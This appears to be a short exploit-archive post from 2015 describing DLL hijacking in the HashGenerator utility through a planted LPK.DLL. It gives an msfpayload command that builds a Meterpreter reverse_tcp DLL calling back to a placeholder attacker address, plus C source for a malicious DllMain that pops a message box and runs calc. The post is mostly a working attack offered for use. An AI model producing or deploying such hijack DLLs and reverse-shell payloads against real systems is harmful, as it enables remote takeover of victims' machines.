facebook facebook twitter rss

HashGenerator DLL Hijacking

Author: VH4Ck , Published: 10-05-2015
/*

#[+] Author: VH4Ck

#[+] Exploit Title: HashGenerator DLL Hijacking

#[+] Date: 4/5/2015

#[+] Vendor : http://securityxploded.com/download-file.php?id=2211

#[+] Tested on: Windows XpSP3

#[+]Vulnerable DLL---> LPK.DLL

#[+]Make dll payload with metasploit:> msfpayload windows/meterpreter/reverse_tcp LHOST=XXX.XXX.X.X LPORT=XXXX D > LPK.DLL

#[+] GR33TZ : To Bedo Mado and all my friends

#[+] facebook : www.facebook.com/karim.shoair

*/

Proof of Concept (PoC):
============================

#include <windows.h>

int evil() {

MessageBoxA(0, "Calculator will open now", "HashGenerator DLL Hijacking Bug", MB_OK);

WinExec("calc", 0);

exit(0);

return 0;

}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) {

evil();
return 0;

}

Like us on Facebook :